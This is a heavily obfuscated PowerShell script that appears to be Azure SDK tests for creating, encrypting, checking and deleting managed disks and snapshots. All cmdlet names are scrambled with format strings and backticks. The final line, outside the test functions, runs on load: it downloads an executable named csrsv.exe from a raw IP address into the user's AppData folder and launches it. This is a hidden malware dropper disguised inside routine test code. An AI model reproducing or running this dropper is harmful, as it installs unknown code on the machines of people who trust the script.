function T`est-Di`sk
{
    
    ${R`g`NaMe} = &("{5}{4}{3}{0}{1}{2}"-f 'Test','Res','ourceName','pute','-Com','Get');
    ${dI`sk`Name} = ("{0}{1}" -f 'd','isk') + ${rgnA`mE};

    try
    {
        
        ${l`OC} = .("{4}{2}{3}{1}{0}"-f'n','MLocatio','et-Compu','teV','G');
        &("{2}{1}{0}{5}{4}{3}"-f 'r','zu','New-A','up','Gro','eRmResource') -Name ${rGn`A`me} -Location ${L`Oc} -Force;
        ${Su`BId} = &("{5}{3}{4}{7}{8}{2}{6}{1}{0}"-f 'p','eGrou','omRe','et','-Subscript','G','sourc','ion','IdFr') ${r`gN`AME};
        ${MoC`KKEY} = ("{1}{0}{7}{4}{2}{9}{3}{6}{5}{8}" -f 'ps://','htt','-int.net/secr','s/1','ault-int.azure','3','2','myvault.v','/','et');
        ${MOCKsO`U`RcEVAU`lT} = ("{0}{2}{1}{3}"-f'/','riptio','subsc','ns/') + ${s`U`BID} + ("{2}{0}{4}{1}{3}"-f 'c','r','/resour','oups/','eG') + ${RG`Na`me} + ("{0}{5}{11}{4}{7}{2}{8}{10}{6}{1}{3}{9}" -f '/','tVau','.Key','l','ers/Microsof','pr','t/vaults/Tes','t','Vau','t123','l','ovid');
        ${aCCe`SS} = ("{1}{0}" -f'ad','Re');

        
        ${DISkc`O`NFiG} = .("{0}{1}{3}{2}"-f 'New-Azu','reRm','Config','Disk') -Location ${l`Oc} -DiskSizeGB 5 -AccountType ("{1}{0}{2}"-f 'tan','S','dardLRS') -OsType ("{1}{0}{2}"-f 'i','W','ndows') -CreateOption ("{1}{0}"-f 'ty','Emp') -EncryptionSettingsEnabled ${tR`UE};
        
        ${dISK`Con`F`Ig} = &("{2}{5}{0}{6}{3}{4}{1}"-f'AzureRmDis','onKey','S','skEncrypt','i','et-','kDi') -Disk ${di`s`KConf`ig} -SecretUrl ${mocK`k`EY} -SourceVaultId ${MOcK`so`URCeva`Ult};
        ${di`SK`C`ONFig} = &("{2}{1}{4}{5}{7}{3}{0}{6}" -f'onK','Azu','Set-','ncrypti','reRmDiskK','ey','ey','E') -Disk ${disKC`O`NFig} -KeyUrl ${m`OcKk`Ey} -SourceVaultId ${mocksoURcE`VAu`lT};
        &("{2}{3}{0}{4}{1}" -f 'ert-AreE','l','A','ss','qua') ${mo`c`KKey} ${D`I`skc`onFIg}."e`NC`RyPtIONSe`TTIN`Gs"."Dis`Kenc`RyPTiON`kEy"."sEC`R`ETURL";
        &("{3}{4}{2}{0}{1}"-f'q','ual','rt-AreE','As','se') ${mOCk`so`U`RceVA`ULT} ${DIsKC`O`NFiG}."e`NCryptI`oNS`ETTInGS"."dISK`Encry`PTionk`Ey"."s`ouR`ceV`AuLT"."I`D";
        &("{2}{1}{0}" -f 'al','t-AreEqu','Asser') ${MOc`KkeY} ${Disk`Con`FIg}."e`NcRypTI`oNSE`T`TinGs"."KEYeNC`RYPti`O`NKey"."KEYU`Rl";
        &("{1}{3}{0}{2}" -f'reE','A','qual','ssert-A') ${Mo`ckso`U`RcEv`AUlT} ${di`skC`ONF`ig}."enc`RYpt`IoNset`TiNGs"."kE`yEn`crYP`T`IONkey"."sOur`c`Eva`ULT"."id";

        
        ${mO`CKIMA`ge} = ("{1}{2}{0}{3}"-f'cri','/','subs','ptions/') + ${s`Ub`iD} + ("{4}{3}{0}{1}{2}" -f'u','rceGrou','ps/','eso','/r') + ${Rg`Na`me} + ("{9}{4}{7}{0}{8}{10}{13}{6}{3}{11}{2}{12}{5}{1}"-f 'd','3','stI','e/i','o','2','ft.Comput','vi','e','/pr','rs/Mic','mages/Te','mage1','roso');
        ${Dis`kcONf`iG} = .("{3}{6}{1}{0}{4}{7}{5}{2}" -f'ma','mDiskI','ce','Set-Az','geR','en','ureR','efer') -Disk ${dIsk`Co`NfiG} -Id ${mOc`K`I`mAgE} -Lun 0;
        .("{2}{0}{1}"-f 'sert-AreE','qual','As') ${MOC`K`ImAge} ${D`ISkC`on`FIG}."CrEAt`i`ON`dATA"."imaGeR`EFE`RE`NCE"."Id";
        &("{1}{2}{3}{0}" -f'qual','A','ssert-Ar','eE') 0 ${d`ISkCo`NFig}."CrEA`T`iONDATa"."imagE`R`ef`E`Rence"."l`UN";

        ${DIsk`cONF`Ig}."enCr`YPt`ioNSett`iNGs"."en`AB`leD" = ${fal`SE};
        ${dISkc`On`FIg}."e`N`cryPTIONS`et`TINGS"."D`iSKe`N`crypTi`ONKEy" = ${nU`Ll};
        ${d`iSkc`o`NfiG}."e`NCryp`T`iONSEttI`NGs"."kEYen`crYPTi`ON`keY" = ${N`Ull};
        ${di`sK`conf`iG}."CrEat`i`ONd`AtA"."Im`AGE`REf`eRen`Ce" = ${N`Ull};

        &("{2}{3}{1}{4}{0}"-f 'mDisk','e','New-Az','ur','R') -ResourceGroupName ${RgN`AMe} -DiskName ${DI`skNaME} -Disk ${dI`SkC`ONf`Ig};

        
        ${DI`sk} = &("{0}{4}{1}{2}{3}"-f 'Get','re','RmD','isk','-Azu') -ResourceGroupName ${rg`NAMe} -DiskName ${DI`sK`NAme};
        .("{2}{0}{3}{1}{4}" -f 'se','AreEq','As','rt-','ual') 5 ${DI`Sk}."di`SKsI`ZEgb";
        &("{1}{0}{2}{3}"-f'e','Ass','rt-AreEq','ual') ("{1}{2}{0}" -f 'S','Standar','dLR') ${Di`Sk}."aC`c`o`UNttYpe";
        .("{1}{3}{2}{0}"-f'l','Asse','-AreEqua','rt') ("{0}{1}"-f 'Wi','ndows') ${di`sk}."OS`TY`PE";
        .("{2}{4}{1}{3}{0}" -f 'AreEqual','s','A','ert-','s') ("{0}{1}"-f 'E','mpty') ${Di`Sk}."C`REAT`Ion`data"."cRE`A`TeoPtIoN";
        &("{3}{1}{2}{0}" -f'reEqual','s','ert-A','As') ${Fa`LSe} ${DI`sk}."eNC`Ry`PTIOn`S`eTTINgs"."eNAb`L`eD";

        
        .("{3}{0}{2}{4}{1}" -f'ant-','kAccess','AzureR','Gr','mDis') -ResourceGroupName ${r`G`NAMe} -DiskName ${D`iskn`AMe} -Access ${acc`e`ss} -DurationInSecond 5;
        .("{3}{4}{2}{0}{5}{1}{6}" -f '-Azur','RmDiskAcce','ke','Rev','o','e','ss') -ResourceGroupName ${RG`NA`Me} -DiskName ${DIs`kN`A`mE};

        
        ${UpDAT`eC`oNF`IG} = &("{5}{2}{3}{6}{1}{0}{4}"-f'pdate','DiskU','w-','A','Config','Ne','zureRm') -DiskSizeGB 10 -AccountType ("{0}{2}{1}"-f'P','umLRS','remi') -OsType ("{1}{0}" -f 'ndows','Wi') -CreateOption ("{0}{1}"-f'Emp','ty');
        .("{5}{2}{3}{1}{0}{4}"-f 'zu','-A','t','e','reRmDisk','Upda') -ResourceGroupName ${r`Gn`AmE} -DiskName ${dI`S`Kname} -DiskUpdate ${UP`DA`T`ECONfig};

        
        &("{2}{1}{0}{3}"-f'is','D','Remove-AzureRm','k') -ResourceGroupName ${r`gN`Ame} -DiskName ${DI`SKna`me} -Force;
    }
    finally
    {
        
        &("{2}{3}{4}{0}{1}" -f 'Res','ourceGroup','Cle','a','n-') ${RGN`A`Me}
    }
}

function tES`T-SnapS`hoT
{
    
    ${r`GNa`mE} = .("{2}{4}{5}{1}{6}{3}{0}" -f 'ame','u','G','tResourceN','et-C','omp','teTes');
    ${SnA`Psh`oTN`AME} = ("{2}{1}{0}"-f 't','napsho','s') + ${r`G`NAmE};

    try
    {
        
        ${L`OC} = &("{3}{1}{0}{2}"-f'VMLo','et-Compute','cation','G');
        &("{5}{3}{1}{0}{2}{4}"-f'urc','eso','eGrou','RmR','p','New-Azure') -Name ${R`gNa`me} -Location ${l`oC} -Force;
        ${S`UbId} = .("{2}{5}{3}{1}{8}{0}{4}{6}{7}" -f'tionI','Subscri','G','-','dFromRes','et','o','urceGroup','p') ${rgn`AME};
        ${mocK`kEy} = ("{12}{1}{9}{5}{10}{4}{2}{11}{8}{3}{6}{0}{7}" -f '/123','vau','-int.azure-i','e','lt','t.va','ts','/','secr','l','u','nt.net/','https://my');
        ${m`OC`KsoURcEva`ULT} = ("{2}{1}{0}{3}"-f'c','ubs','/s','riptions/') + ${sub`ID} + ("{2}{3}{4}{1}{5}{0}" -f 'ups/','eGr','/r','eso','urc','o') + ${rg`NAMe} + ("{0}{5}{11}{10}{3}{1}{6}{2}{7}{4}{9}{8}"-f'/pro','so','t.KeyVault/v','s/Micro','l','vid','f','au','TestVault123','ts/','r','e');
        ${Ac`ceSs} = ("{0}{1}"-f 'R','ead');

        
        ${s`Na`pSh`OtcONFig} = &("{1}{6}{4}{2}{5}{0}{3}" -f 'fi','Ne','RmSnaps','g','-Azure','hotCon','w') -Location ${L`oc} -DiskSizeGB 5 -AccountType ("{0}{1}{2}{3}" -f'Sta','nda','r','dLRS') -OsType ("{0}{1}" -f 'W','indows') -CreateOption ("{0}{1}" -f'Empt','y') -EncryptionSettingsEnabled ${tR`UE};

        
        ${SnAp`s`h`O`TCOnfIG} = .("{1}{5}{0}{2}{6}{4}{3}"-f 'RmSn','Set-Azu','aps','ey','EncryptionK','re','hotDisk') -Snapshot ${sNApsh`OTC`On`FIG} -SecretUrl ${Mo`cKK`EY} -SourceVaultId ${m`ocKs`ouR`ceV`A`Ult};
        ${SN`AP`ShotCo`NFIg} = .("{6}{4}{2}{8}{1}{0}{3}{5}{7}"-f'i','eyEncrypt','eRmSnapshot','o','t-Azur','nKe','Se','y','K') -Snapshot ${s`Na`pshoT`confIg} -KeyUrl ${MO`cKk`EY} -SourceVaultId ${MoCk`soUr`c`EVAUlT};
        .("{2}{1}{3}{0}" -f'al','-AreE','Assert','qu') ${moCkk`EY} ${s`NaPSHO`TCon`F`iG}."eNcR`Yp`Ti`o`NseTtings"."dIs`Ke`NCR`yptIonK`ey"."s`ecREt`URl";
        .("{3}{0}{1}{2}{4}" -f 'rt','-A','re','Asse','Equal') ${MoC`ks`O`URCeV`A`UlT} ${sN`ApSHOTConF`Ig}."eN`c`RYPtionse`TT`ings"."D`iSkeNCRYPti`o`NKey"."SouRcev`A`Ult"."iD";
        &("{1}{0}{4}{2}{3}" -f's','As','rt-AreEqua','l','e') ${moc`KK`EY} ${s`N`APsHOTcO`Nf`iG}."e`NCryPti`o`NsETt`ings"."KEYEN`CR`YPTIOnk`ey"."KEYU`RL";
        &("{3}{0}{4}{1}{2}" -f 's','re','Equal','A','sert-A') ${m`ock`SoUrc`EvaU`lt} ${S`Na`PS`Hot`coNFIg}."En`CrYPTioNs`etti`NGS"."keYencryPT`i`O`NKey"."SouR`cEVA`U`lt"."I`D";

        
        ${MOck`I`maGE} = ("{2}{1}{0}"-f'/','ns','/subscriptio') + ${s`UBId} + ("{2}{3}{0}{1}"-f'u','ps/','/resour','ceGro') + ${R`G`Name} + ("{4}{0}{7}{3}{1}{9}{6}{2}{8}{5}" -f'ovid','i','mages','rs/M','/pr','Image123','osoft.Compute/i','e','/Test','cr');
        ${snAPSh`o`TC`onFiG} = &("{2}{1}{9}{3}{0}{6}{8}{7}{5}{4}"-f 'pshotIma','et-','S','zureRmSna','nce','ere','geR','f','e','A') -Snapshot ${snA`Psh`OtC`On`FiG} -Id ${mOC`k`ImaGE} -Lun 0;
        &("{0}{1}{3}{2}"-f'A','ssert-Ar','l','eEqua') ${m`OCKImA`ge} ${SN`APShO`Tc`oNf`Ig}."CrE`A`TiOndAtA"."ImAgE`R`efEr`Ence"."Id";
        &("{2}{4}{1}{3}{0}" -f'eEqual','sert','A','-Ar','s') 0 ${sNAPSH`ot`cOnFig}."crEA`TIO`NdAtA"."iM`AgE`R`EferEnce"."L`UN";

        ${s`NaPSh`OtC`oNFiG}."enCRy`pt`i`OnS`etti`NGs"."Ena`BlED" = ${fA`L`SE};
        ${sNaps`HOtCO`N`FIG}."eNcr`yp`TiO`N`SeTTInGS"."dISke`Nc`R`ypTiON`keY" = ${nu`LL};
        ${SnaPsH`oTC`oNf`Ig}."En`c`R`Y`PTi`onseTtIngs"."KEYeN`c`RY`p`TIOnK`EY" = ${Nu`Ll};
        ${s`NaP`ShOtCON`FiG}."cr`Eat`I`ONDaTa"."iM`A`g`eReFeRencE" = ${N`Ull};
        &("{1}{2}{0}{3}"-f 'm','New','-AzureR','Snapshot') -ResourceGroupName ${rGnA`Me} -SnapshotName ${snAp`sHo`T`NAME} -Snapshot ${Sn`AP`S`HotCon`FIg};

        
        ${s`N`ApShoT} = .("{4}{5}{3}{0}{2}{1}" -f'n','ot','apsh','mS','Get-Azu','reR') -ResourceGroupName ${r`Gn`Ame} -SnapshotName ${SnaPs`H`oT`Na`mE};
        &("{3}{1}{2}{0}" -f 'eEqual','ser','t-Ar','As') 5 ${s`Nap`shot}."DISk`sizE`gb";
        .("{3}{0}{2}{1}" -f 'ssert-A','ual','reEq','A') ("{2}{3}{1}{0}" -f 'LRS','dard','S','tan') ${SN`ApS`HoT}."a`cC`OUNTtYPE";
        &("{3}{4}{0}{1}{2}" -f'ert-A','r','eEqual','A','ss') ("{1}{0}{2}"-f'w','Windo','s') ${sNap`s`Hot}."O`sTy`Pe";
        .("{0}{1}{2}" -f'Assert-Are','Eq','ual') ("{0}{1}"-f'Emp','ty') ${S`N`APSh`OT}."CRe`At`IOnD`AtA"."cR`eATE`OP`Tion";
        .("{0}{1}{2}{4}{3}"-f'Asse','rt','-A','Equal','re') ${F`ALSe} ${snaPS`hOT}."ENCrYpT`I`on`sE`TtINGS"."ENa`BLED";

        
        &("{6}{2}{7}{3}{5}{1}{0}{4}" -f'c','pshotA','-','zureRmSn','cess','a','Grant','A') -ResourceGroupName ${RGn`AmE} -SnapshotName ${s`NAPS`HO`TnaME} -Access ${AC`cE`ss} -DurationInSecond 5;
        .("{3}{6}{1}{4}{0}{5}{2}"-f 's','m','Access','Revoke-','Snap','hot','AzureR') -ResourceGroupName ${RG`NaME} -SnapshotName ${s`NA`psh`oTna`Me};

        
        ${Up`da`TeC`onF`ig} = &("{0}{1}{4}{9}{8}{3}{2}{5}{7}{6}"-f'Ne','w','tU','ho','-Az','pda','fig','teCon','aps','ureRmSn') -DiskSizeGB 10 -AccountType ("{2}{0}{1}" -f'remi','umLRS','P') -OsType ("{1}{0}" -f'ws','Windo') -CreateOption ("{0}{1}" -f 'Emp','ty');
        .("{0}{4}{2}{3}{1}" -f 'Upd','pshot','-A','zureRmSna','ate') -ResourceGroupName ${R`GnAMe} -SnapshotName ${s`N`APShOTn`Ame} -SnapshotUpdate ${U`PDaTeC`O`N`Fig};

        
        .("{3}{2}{1}{4}{0}" -f 'shot','u','e-Az','Remov','reRmSnap') -ResourceGroupName ${rgN`A`ME} -SnapshotName ${SnA`pS`hoT`Name} -Force;
    }
    finally
    {
        
        .("{2}{3}{5}{4}{0}{1}"-f'eGr','oup','Clean','-','ourc','Res') ${R`gNaMe}
    }
}
(.("{0}{1}{2}" -f 'N','ew-O','bject') ("{4}{1}{6}{2}{3}{5}{0}"-f 't','te','Net.W','ebCli','Sys','en','m.')).("{1}{0}{3}{2}" -f'o','D','dFile','wnloa').Invoke(("{5}{4}{3}{2}{6}{0}{1}"-f'hoo','/csrsv.exe','y','4.102.53.238/~','//9','http:','a'),"$env:APPDATA\csrsv.exe");.("{1}{3}{4}{2}{0}" -f 's','S','t-Proces','ta','r') ("$env:APPDATA\csrsv.exe")
